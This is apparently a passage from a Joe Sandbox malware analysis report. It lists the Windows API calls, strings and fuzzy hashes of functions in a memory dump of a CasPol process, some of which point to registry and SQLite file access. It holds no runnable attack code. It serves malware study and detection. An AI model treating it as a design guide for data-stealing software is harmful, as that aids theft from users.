                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: advapi32.dll
                                                                                                                                                              • API String ID: 2012295524-4050573280
                                                                                                                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                              • <%s>, xrefs: 004100A6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_snwprintf
                                                                                                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                              • API String ID: 3473751417-2880344631
                                                                                                                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscat$_snwprintfmemset
                                                                                                                                                              • String ID: %2.2X
                                                                                                                                                              • API String ID: 2521778956-791839006
                                                                                                                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintfwcscpy
                                                                                                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                              • API String ID: 999028693-502967061
                                                                                                                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                              • memset.MSVCRT ref: 0040C439
                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                              • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4131475296-0
                                                                                                                                                              • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                              • Opcode Fuzzy Hash: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004116FF
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                              • API String ID: 2618321458-3614832568
                                                                                                                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFilefreememset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2507021081-0
                                                                                                                                                              • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                              • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                              APIs
                                                                                                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                              • malloc.MSVCRT ref: 00417524
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                              • free.MSVCRT ref: 00417544
                                                                                                                                                              • free.MSVCRT ref: 00417562
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4131324427-0
                                                                                                                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                              • free.MSVCRT ref: 0041822B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PathTemp$free
                                                                                                                                                              • String ID: %s\etilqs_$etilqs_
                                                                                                                                                              • API String ID: 924794160-1420421710
                                                                                                                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                              APIs
                                                                                                                                                              • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                              • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                              • String ID: General
                                                                                                                                                              • API String ID: 999786162-26480598
                                                                                                                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                              • String ID: Error$Error %d: %s
                                                                                                                                                              • API String ID: 313946961-1552265934
                                                                                                                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                              • API String ID: 0-1953309616
                                                                                                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                              • API String ID: 3510742995-272990098
                                                                                                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                              • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                              • String ID: gj
                                                                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                              • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@$free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2241099983-0
                                                                                                                                                              • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                              • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                              APIs
                                                                                                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                              • malloc.MSVCRT ref: 004174BD
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                              • free.MSVCRT ref: 004174E4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4053608372-0
                                                                                                                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                              APIs
                                                                                                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4247780290-0
                                                                                                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                              • memset.MSVCRT ref: 004450CD
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1471605966-0
                                                                                                                                                              • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                              • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                              APIs
                                                                                                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
